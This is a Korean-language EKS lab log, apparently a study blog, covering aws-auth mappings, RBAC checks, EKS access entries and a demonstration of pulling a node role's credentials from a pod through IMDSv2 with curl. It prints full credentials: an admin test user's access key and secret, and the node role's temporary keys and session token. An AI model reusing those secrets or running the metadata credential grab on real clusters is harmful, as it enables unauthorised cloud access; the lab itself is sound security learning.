# validatingwebhookconfigurations 리소스 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get validatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 87m
eks-aws-auth-configmap-validation-webhook 1 107m ## 해당 리소스
kube-prometheus-stack-admission 1 85m
vpc-resource-validating-webhook 2 107m
# aws-auth 컨피그맵 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
username: system:node:{{EC2PrivateDNSName}}
kind: ConfigMap
metadata:
name: aws-auth
namespace: kube-system
#---<아래 생략(추정), ARN은 EKS를 설치한 IAM User , 여기 있었을경우 만약 실수로 삭제 시 복구가 가능했을까요? 에전에는 존재 헀는데, 이제는 보이지 않게 됨. 예전에는 주체를 확인할 수 있었음
mapUsers: |
- groups:
- system:masters
userarn: arn:aws:iam::111122223333:user/admin
username: kubernetes-admin
# EKS 설치한 IAM User 정보 >> system:authenticated는 어떤 방식으로 추가가 되었는지
$ kubectl rbac-tool whoami
# system:masters , system:authenticated 그룹의 정보 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool lookup system:masters
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+----------------+--------------+-------------+-----------+---------------+---------------+
system:masters | Group | ClusterRole | | cluster-admin | cluster-admin
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool lookup system:authenticated
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+----------------------+--------------+-------------+-----------+---------------------------+---------------------------+
system:authenticated | Group | ClusterRole | | system:basic-user | system:basic-user
system:authenticated | Group | ClusterRole | | system:discovery | system:discovery
system:authenticated | Group | ClusterRole | | system:public-info-viewer | system:public-info-viewer
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rolesum -k Group system:masters
Group: system:masters
Policies:
• [CRB] */cluster-admin ⟶ [CR] */cluster-admin
Resource Name Exclude Verbs G L W C U P D DC
*.* [*] [-] [-] ✔ ✔ ✔ ✔ ✔ ✔ ✔ ✔
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rolesum -k Group system:authenticated
Group: system:authenticated
Policies:
• [CRB] */system:basic-user ⟶ [CR] */system:basic-user
Resource Name Exclude Verbs G L W C U P D DC
selfsubjectaccessreviews.authorization.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
selfsubjectreviews.authentication.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
selfsubjectrulesreviews.authorization.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
• [CRB] */system:discovery ⟶ [CR] */system:discovery
• [CRB] */system:public-info-viewer ⟶ [CR] */system:public-info-viewer
# system:masters 그룹이 사용 가능한 클러스터 롤 확인 : cluster-admin
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe clusterrolebindings.rbac.authorization.k8s.io cluster-admin
Name: cluster-admin
Labels: kubernetes.io/bootstrapping=rbac-defaults
Annotations: rbac.authorization.kubernetes.io/autoupdate: true
Role:
Kind: ClusterRole
Name: cluster-admin
Subjects:
Kind Name Namespace
---- ---- ---------
Group system:masters
# cluster-admin 의 PolicyRule 확인 : 모든 리소스에 사용 가능
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe clusterrole cluster-admin
Name: cluster-admin
Labels: kubernetes.io/bootstrapping=rbac-defaults
Annotations: rbac.authorization.kubernetes.io/autoupdate: true
PolicyRule:
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
[*] [] [*]
# system:authenticated 그룹이 사용 가능한 클러스터 롤 확인
kubectl describe ClusterRole system:discovery
kubectl describe ClusterRole system:public-info-viewer
kubectl describe ClusterRole system:basic-user
kubectl describe ClusterRole eks:podsecuritypolicy:privileged
생성한 User 는 실습 이후 삭제 예정!
터미널 하나 더 열어서 Bastion-2 인스턴스 SSH 접속
# testuser 사용자 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws iam create-user --user-name testuser
{
"User": {
"Path": "/",
"UserName": "testuser",
"UserId": "AIDATOH2FIJQZQUSI5J7W",
"Arn": "arn:aws:iam::236747833953:user/testuser",
"CreateDate": "2024-04-12T14:03:12+00:00"
}
}
# 사용자에게 프로그래밍 방식 액세스 권한 부여
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws iam create-access-key --user-name testuser
{
"AccessKey": {
"UserName": "testuser",
"AccessKeyId": "AKIATOH2FIJQSSIHIZGL",
"Status": "Active",
"SecretAccessKey": "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",
"CreateDate": "2024-04-12T14:03:28+00:00"
}
}
# testuser 사용자에 정책을 추가
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name testuser
# get-caller-identity 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/leeeuijoo"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl whoami
arn:aws:iam::236747833953:user/leeeuijoo
# 자격증명 설정이 안되어 있기 때문에 오류를 뿜음
[root@myeks2-bastion-2 ~]# aws sts get-caller-identity --query Arn
Unable to locate credentials. You can configure credentials by running "aws configure".
# testuser 자격증명 설정
[root@myeks2-bastion-2 ~]# aws configure
AWS Access Key ID [None]:
..
[root@myeks2-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/testuser"
# kubectl 시도 >> testuser도 AdministratorAccess 권한을 가지고 있는데, 실패 하는 이유는 Kubeconfig 파일이 없기 때문
[root@myeks2-bastion-2 ~]# clear
[root@myeks2-bastion-2 ~]# kubectl get node -v6
I0412 23:09:59.345744 1821 round_trippers.go:553] GET http://localhost:8080/api?timeout=32s in 0 milliseconds
E0412 23:09:59.345863 1821 memcache.go:265] couldn't get current server API group list: Get "http://localhost:8080/api?timeout=32s": dial tcp 127.0.0.1:8080: connect: connection refused
I0412 23:09:59.345904 1821 cached_discovery.go:120] skipped caching discovery info due to Get \
...
[root@myeks2-bastion-2 ~]# ls ~/.kube
ls: cannot access /root/.kube: No such file or directory
# 방안1 : eksctl 사용 >> iamidentitymapping 실행 시 aws-auth 컨피그맵 작성해줌
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl create iamidentitymapping --cluster $CLUSTER_NAME --username testuser --group system:masters --arn arn:aws:iam::$ACCOUNT_ID:user/testuser
2024-04-12 23:13:26 [ℹ] checking arn arn:aws:iam::236747833953:user/testuser against entries in the auth ConfigMap
2024-04-12 23:13:26 [ℹ] adding identity "arn:aws:iam::236747833953:user/testuser" to auth ConfigMap
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
arn:aws:iam::236747833953:user/testuser testuser system:masters
# reopened with the relevant failures.
#
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
username: system:node:{{EC2PrivateDNSName}}
mapUsers: |
- groups:
- system:masters
userarn: arn:aws:iam::236747833953:user/testuser
username: testuser
# testuser kubeconfig 생성 >> aws eks update-kubeconfig 실행이 가능한 이유는 testuser 생성 시에 권한을 줬가 때문입니다.
[root@myeks2-bastion-2 ~]# aws eks update-kubeconfig --name $CLUSTER_NAME --user-alias testuser
Added new context testuser to /root/.kube/config
# 첫번째 bastion ec2의 config와 비교
-> 내용은 차이가 없습니다.
# kubectl 사용 확인
(testuser:N/A) [root@myeks2-bastion-2 ~]# kubectl ns default
Context "testuser" modified.
Active namespace is "default".
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get node -v6
I0412 23:21:36.278032 1988 loader.go:395] Config loaded from file: /root/.kube/config
I0412 23:21:36.966772 1988 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/nodes?limit=500 200 OK in 680 milliseconds
NAME STATUS ROLES AGE VERSION
ip-192-168-1-231.ap-northeast-2.compute.internal Ready <none> 136m v1.28.5-eks-5e0fdde
ip-192-168-2-179.ap-northeast-2.compute.internal Ready <none> 136m v1.28.5-eks-5e0fdde
ip-192-168-3-12.ap-northeast-2.compute.internal Ready <none> 136m v1.28.5-eks-5e0fdde
# rbac-tool 후 확인 >> 기존 계정과 비교해봅시다.
{Username: "testuser",
UID: "aws-iam-authenticator:236747833953:AIDATOH2FIJQZQUSI5J7W",
Groups: ["system:masters",
"system:authenticated"],
Extra: {accessKeyId: ["AKIATOH2FIJQSSIHIZGL"],
arn: ["arn:aws:iam::236747833953:user/testuser"],
canonicalArn: ["arn:aws:iam::236747833953:user/testuser"],
principalId: ["AIDATOH2FIJQZQUSI5J7W"],
sessionName: [""]}}
# 아래 edit로 mapUsers 내용 직접 수정 system:authenticated
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl edit cm -n kube-system aws-auth
configmap/aws-auth edited
# 바뀐 것 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
arn:aws:iam::236747833953:user/testuser testuser system:authenticated
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get node -v6
I0412 23:26:01.651031 2163 loader.go:395] Config loaded from file: /root/.kube/config
I0412 23:26:02.599377 2163 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/nodes?limit=500 403 Forbidden in 936 milliseconds
I0412 23:26:02.599785 2163 helpers.go:246] server response object: [{
"kind": "Status",
"apiVersion": "v1",
"metadata": {},
"status": "Failure",
"message": "nodes is forbidden: User \"testuser\" cannot list resource \"nodes\" in API group \"\" at the cluster scope",
"reason": "Forbidden",
"details": {
"kind": "nodes"
},
"code": 403
}]
Error from server (Forbidden): nodes is forbidden: User "testuser" cannot list resource "nodes" in API group "" at the cluster scope
$ kubectl api-resources -v5
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl api-resources -v5
NAME SHORTNAMES APIVERSION NAMESPACED KIND
bindings v1 true Binding
componentstatuses cs v1 false ComponentStatus
configmaps cm v1 true ConfigMap
endpoints ep v1 true Endpoints
events ev v1 true Event
limitranges limits v1 true LimitRange
namespaces ns v1 false Namespace
nodes no v1 false Node
persistentvolumeclaims pvc v1 true PersistentVolumeClaim
persistentvolumes pv v1 false PersistentVolume
pods po v1 true Pod
podtemplates v1 true PodTemplate
replicationcontrollers rc v1 true ReplicationController
resourcequotas quota v1 true ResourceQuota
secrets v1 true Secret
serviceaccounts sa v1 true ServiceAccount
services svc v1 true Service
mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration
customresourcedefinitions crd,crds apiextensions.k8s.io/v1 false CustomResourceDefinition
apiservices apiregistration.k8s.io/v1 false APIService
controllerrevisions apps/v1 true ControllerRevision
daemonsets ds apps/v1 true DaemonSet
deployments deploy apps/v1 true Deployment
replicasets rs apps/v1 true ReplicaSet
statefulsets sts apps/v1 true StatefulSet
selfsubjectreviews authentication.k8s.io/v1 false SelfSubjectReview
tokenreviews authentication.k8s.io/v1 false TokenReview
localsubjectaccessreviews authorization.k8s.io/v1 true LocalSubjectAccessReview
selfsubjectaccessreviews authorization.k8s.io/v1 false SelfSubjectAccessReview
selfsubjectrulesreviews authorization.k8s.io/v1 false SelfSubjectRulesReview
subjectaccessreviews authorization.k8s.io/v1 false SubjectAccessReview
horizontalpodautoscalers hpa autoscaling/v2 true HorizontalPodAutoscaler
cronjobs cj batch/v1 true CronJob
jobs batch/v1 true Job
certificatesigningrequests csr certificates.k8s.io/v1 false CertificateSigningRequest
leases coordination.k8s.io/v1 true Lease
eniconfigs crd.k8s.amazonaws.com/v1alpha1 false ENIConfig
endpointslices discovery.k8s.io/v1 true EndpointSlice
ingressclassparams elbv2.k8s.aws/v1beta1 false IngressClassParams
targetgroupbindings elbv2.k8s.aws/v1beta1 true TargetGroupBinding
events ev events.k8s.io/v1 true Event
flowschemas flowcontrol.apiserver.k8s.io/v1beta3 false FlowSchema
prioritylevelconfigurations flowcontrol.apiserver.k8s.io/v1beta3 false PriorityLevelConfiguration
nodes metrics.k8s.io/v1beta1 false NodeMetrics
pods metrics.k8s.io/v1beta1 true PodMetrics
alertmanagerconfigs amcfg monitoring.coreos.com/v1alpha1 true AlertmanagerConfig
alertmanagers am monitoring.coreos.com/v1 true Alertmanager
podmonitors pmon monitoring.coreos.com/v1 true PodMonitor
probes prb monitoring.coreos.com/v1 true Probe
prometheusagents promagent monitoring.coreos.com/v1alpha1 true PrometheusAgent
prometheuses prom monitoring.coreos.com/v1 true Prometheus
prometheusrules promrule monitoring.coreos.com/v1 true PrometheusRule
scrapeconfigs scfg monitoring.coreos.com/v1alpha1 true ScrapeConfig
servicemonitors smon monitoring.coreos.com/v1 true ServiceMonitor
thanosrulers ruler monitoring.coreos.com/v1 true ThanosRuler
policyendpoints networking.k8s.aws/v1alpha1 true PolicyEndpoint
ingressclasses networking.k8s.io/v1 false IngressClass
ingresses ing networking.k8s.io/v1 true Ingress
networkpolicies netpol networking.k8s.io/v1 true NetworkPolicy
runtimeclasses node.k8s.io/v1 false RuntimeClass
poddisruptionbudgets pdb policy/v1 true PodDisruptionBudget
clusterrolebindings rbac.authorization.k8s.io/v1 false ClusterRoleBinding
clusterroles rbac.authorization.k8s.io/v1 false ClusterRole
rolebindings rbac.authorization.k8s.io/v1 true RoleBinding
roles rbac.authorization.k8s.io/v1 true Role
priorityclasses pc scheduling.k8s.io/v1 false PriorityClass
csidrivers storage.k8s.io/v1 false CSIDriver
csinodes storage.k8s.io/v1 false CSINode
csistoragecapacities storage.k8s.io/v1 true CSIStorageCapacity
storageclasses sc storage.k8s.io/v1 false StorageClass
volumeattachments storage.k8s.io/v1 false VolumeAttachment
cninodes cnd vpcresources.k8s.aws/v1alpha1 false CNINode
securitygrouppolicies sgp vpcresources.k8s.aws/v1beta1 true SecurityGroupPolicy
# testuser IAM 맵핑 삭제
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl delete iamidentitymapping --cluster $CLUSTER_NAME --arn arn:aws:iam::$ACCOUNT_ID:user/testuser
2024-04-12 23:28:35 [ℹ] removing identity "arn:aws:iam::236747833953:user/testuser" from auth ConfigMap (username = "testuser", groups = ["system:authenticated"])
# Get IAM identity mapping(s)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get cm -n kube-system aws-auth -o yaml | yh
...
mapUsers: |
[]
kind: ConfigMap
metadata:
creationTimestamp: "2024-04-12T12:04:18Z"
name: aws-auth
namespace: kube-system
resourceVersion: "44284"
uid: fad6d576-294c-42e6-882e-e5012465be0a
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get node -v6
I0412 23:30:23.250487 2378 loader.go:395] Config loaded from file: /root/.kube/config
I0412 23:30:24.646041 2378 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/nodes?limit=500 401 Unauthorized in 1386 milliseconds
I0412 23:30:24.646308 2378 helpers.go:246] server response object: [{
"kind": "Status",
"apiVersion": "v1",
"metadata": {},
"status": "Failure",
"message": "Unauthorized",
"reason": "Unauthorized",
"code": 401
}]
error: You must be logged in to the server (Unauthorized)
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl api-resources -v5
E0412 23:30:29.776461 2432 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0412 23:30:29.776486 2432 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
NAME SHORTNAMES APIVERSION NAMESPACED KIND
I0412 23:30:29.776667 2432 helpers.go:246] server response object: [{
"metadata": {},
"status": "Failure",
"message": "the server has asked for the client to provide credentials",
"reason": "Unauthorized",
"details": {
"causes": [
{
"reason": "UnexpectedServerResponse",
"message": "unknown"
}
]
},
"code": 401
}]
error: You must be logged in to the server (the server has asked for the client to provide credentials)
Sample Config File
# Please edit the object below. Lines beginning with a '#' will be ignored,
# and an empty file will abort the edit. If an error occurs while saving this file will be
# reopened with the relevant failures.
#
apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::111122223333:role/my-role
username: system:node:{{EC2PrivateDNSName}}
- groups:
- eks-console-dashboard-full-access-group
rolearn: arn:aws:iam::111122223333:role/my-console-viewer-role
username: my-console-viewer-role
mapUsers: |
- groups:
- system:masters
userarn: arn:aws:iam::111122223333:user/admin
username: admin
- groups:
- eks-console-dashboard-restricted-access-group
userarn: arn:aws:iam::444455556666:user/my-user
username: my-user
# 노드에 STS ARN 정보 확인 : Role 뒤에는 구분자인 인스턴스 ID 입니다.
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node aws sts get-caller-identity --query Arn; done
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-0ba38cf4130566468"
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-0b895572c43f3680b"
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-003d0540317262201"
# aws-auth 컨피그맵 확인 >> system:nodes 와 system:bootstrappers 의 권한은 어떤게 있는지
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe configmap -n kube-system aws-auth
Name: aws-auth
Namespace: kube-system
Labels: <none>
Annotations: <none>
Data
====
mapRoles:
----
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
username: system:node:{{EC2PrivateDNSName}}
mapUsers:
----
[]
BinaryData
====
Events: <none>
# Get IAM identity mapping(s)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
# awscli 파드 생성
cat <<EOF | kubectl create -f -
apiVersion: apps/v1
kind: Deployment
metadata:
name: awscli-pod
spec:
replicas: 2
selector:
matchLabels:
app: awscli-pod
template:
metadata:
labels:
app: awscli-pod
spec:
containers:
- name: awscli-pod
image: amazon/aws-cli
command: ["tail"]
args: ["-f", "/dev/null"]
terminationGracePeriodSeconds: 0
EOF
# 파드 생성 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod -owide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 16s 192.168.1.162 ip-192-168-1-231.ap-northeast-2.compute.internal <none> <none>
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 16s 192.168.3.16 ip-192-168-3-12.ap-northeast-2.compute.internal <none> <none>
# 파드 이름 변수 지정
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# APODNAME1=$(kubectl get pod -l app=awscli-pod -o jsonpath={.items[0].metadata.name})
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# APODNAME2=$(kubectl get pod -l app=awscli-pod -o jsonpath={.items[1].metadata.name})
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo $APODNAME1, $APODNAME2
awscli-pod-5bdb44b5bd-9b99k, awscli-pod-5bdb44b5bd-g6gdk
# awscli 파드에서 EC2 InstanceProfile(IAM Role)의 ARN 정보 확인 - 엥 이게 왜 되노
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it $APODNAME1 -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-0ba38cf4130566468"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it $APODNAME2 -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-003d0540317262201"
# awscli 파드에서 EC2 InstanceProfile(IAM Role)을 사용하여 AWS 서비스 정보 확인 >> 별도 IAM 자격 증명이 없는데 어떻게 조회가 가능한 것일까요?
kubectl exec -it $APODNAME1 -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager
kubectl exec -it $APODNAME2 -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager
# EC2 메타데이터 확인 : IDMSv1은 Disable, IDMSv2 활성화 상태, IAM Role - 링크
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it $APODNAME1 -- bash
bash-4.2#
---------------
bash-4.2# curl -s http://169.254.169.254/ -v
* Trying 169.254.169.254:80...
* Connected to 169.254.169.254 (169.254.169.254) port 80
> GET / HTTP/1.1
> Host: 169.254.169.254
> User-Agent: curl/8.3.0
> Accept: */*
>
< HTTP/1.1 401 Unauthorized
< Content-Length: 0
< Date: Fri, 12 Apr 2024 14:45:28 GMT
< Server: EC2ws
< Connection: close
< Content-Type: text/plain
<
* Closing connection
# Token 요청
bash-4.2# curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" ; echo
AQAEAGvssGgyhaNFZdQEwAJ4-GhOCOZ5t-w1_mZsfyymWFB0OW4WEw==
# Token을 이용한 IMDSv2 사용
bash-4.2# TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
bash-4.2# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" –v http://169.254.169.254/ ; echo
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
...
bash-4.2# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" –v http://169.254.169.254/latest/ ; echo
dynamic
meta-data
user-data
...
bash-4.2# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/ ; echo
eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
# 위에서 출력된 IAM Role을 아래 입력 후 확인
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
bash-4.2# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" –v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
{
"Code" : "Success",
"LastUpdated" : "2024-04-12T14:46:05Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIATOH2FIJQUA4MUTSA",
"SecretAccessKey" : "rAHJHsvgXfe3lhf7BVsWB66KtTYXxeClkyOuhhhQ",
"Token" : "IQoJb3JpZ2luX2VjECcaDmFwLW5vcnRoZWFzdC0yIkYwRAIgRhe1HYJN3bBxErWe5CGJJGwstnPNDER/ky+bcKx7kgwCIGGGTSecT1cikanId3PssqlUOOrO/BG3DGMYVURDcl3cKswFCGAQARoMMjM2NzQ3ODMzOTUzIgwvypWs2vej2GLe4nIqqQXbyPQrp6vW8M7RwusZIMJkOgTnLWnJ++20NmBa9QNBx1o2kYPonB6uiWtpcG2V1w9/dfAFMVyswqlmenkw8SZPAnACVOBc+ydSKprGdf3eT4N452Y6cY1huGxlMVVch6KrOjrizoX+qtblvfZGDR7hHA3S9/WAbVk78NuAHUT8mD1HjVNEuRu4TmeC8HApwKtymLuo8fX9qqr9pTr+h0aYd82Dp+rOMar+t2AKD8TmvkkuMjiQBNJqAH2nP3TcoGsomlfX+/FYytB13sBLzMs3C2QxiCnan24b6lJNCx9gjsgERSOnfqm76V5AvRPrnFeEadhX0PixmsXnL7D58/eQnrCkeVBTxEVLaDe9LLo9ptCe+67Bs1CbEMbQCMvwR/8wKtipY5uKASrH9yRq+s2FmmCT6XELfpxarBDd2YyHAt5SegBXPZJSjnZFLAuba8a2djGauKeXRLcYu0XLwXIVNpiSPl+L7IjVO3OeYtaPpBi+QIj+naqDWE+xKMTTitwFzME+DFSyM89xmEWvubJEzXbf+Wr8W9SSvdtxovmdKRSy6A8A4Y5/N87Iesb5vil7dllptgDGGc/39xlmTBhTR7mUniF4zz6rhaYQw+wVkLeAYis0nid96Lm4KTYaxBkAd6vrunvQo3/vScBpVv2G/CXOdYpMsCLB4FE8bIhP6CzZoy/EsK7e7lGGL1Ayfrxnt2Pb7aN57w+aN1j3SoN0jY+UYKxSLT2X0AH536SjnPofsUM6irv+Cgo4PsMQ29owUbF5zkI68gSa1sPaC+eyzHPY9YtArAMgmABPrK9AQNGtBG1uQRfxfsLivD3+N5XJ6wn/UIjRGTIsffnvOsRqX5ytL1oVcADEOsOHD0NzajQbo4EnuVCZWKj61NUnxf+qmJJAEgXlBrEw9ZHlsAY6sgGki7JEAgVA8CvpZFWrt2PKY16+PKpkkc0vDLO8NbS8gkApNnY96T50UcI3932HeXd/n26d1pBCYY4XB1up1TW1MTR0NU0RUoi4FJsiu8FVpy1UAv9bG9QMWxLmuSqTU0xXDBmAbvaq9X9QmAFm+jEG9Tpm/SABW4MxnZ/HY5qKDw2IH+88KiGyt/Xj7KMxzRvaTUE/A/NXcWCa8pitnZl/RW4GvDL1lFL5gzNDia6efe4D",
"Expiration" : "2024-04-12T20:52:39Z"
}
## 출력된 정보는 AWS API를 사용할 수 있는 어느곳에서든지 Expiration 되기전까지 사용 가능 - 위험
exit
신기술 : A deep dive into simplified(단순화) Amazon EKS access management controls
기본적으로 활성화 되어 있음
EKS → 액세스 : IAM 액세스 항목
EKS → 액세스 구성 모드 확인 : EKS API 및 ConfigMap ← 정책 중복 시 EKS API 우선되며 ConfigMap은 무시됨
# EKS API 액세스모드로 변경
aws eks update-cluster-config --name $CLUSTER_NAME --access-config authenticationMode=API
# List all access policies : 클러스터 액세스 관리를 위해 지원되는 액세스 정책
## AmazonEKSClusterAdminPolicy – 클러스터 관리자
## AmazonEKSAdminPolicy – 관리자
## AmazonEKSEditPolicy – 편집
## AmazonEKSViewPolicy – 보기
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks list-access-policies | jq
{
"accessPolicies": [
{
"name": "AmazonEKSAdminPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSAdminPolicy"
},
{
"name": "AmazonEKSClusterAdminPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy"
},
{
"name": "AmazonEKSEditPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSEditPolicy"
},
{
"name": "AmazonEKSViewPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSViewPolicy"
},
{
"name": "AmazonEMRJobPolicy",
"arn": "arn:aws:eks::aws:cluster-access-policy/AmazonEMRJobPolicy"
}
]
}
# 맵핑 클러스터롤 정보 확인
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get clusterroles -l 'kubernetes.io/bootstrapping=rbac-defaults' | grep -v 'system:'
NAME CREATED AT
admin 2024-04-12T11:54:42Z
cluster-admin 2024-04-12T11:54:42Z
edit 2024-04-12T11:54:42Z
view 2024-04-12T11:54:42Z
kubectl describe clusterroles admin
kubectl describe clusterroles cluster-admin
kubectl describe clusterroles edit
kubectl describe clusterroles view
이제 더이상 configmap 을 사용하지 못합니다. 유의할 것
# testuser 의 access entry 생성
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser
{
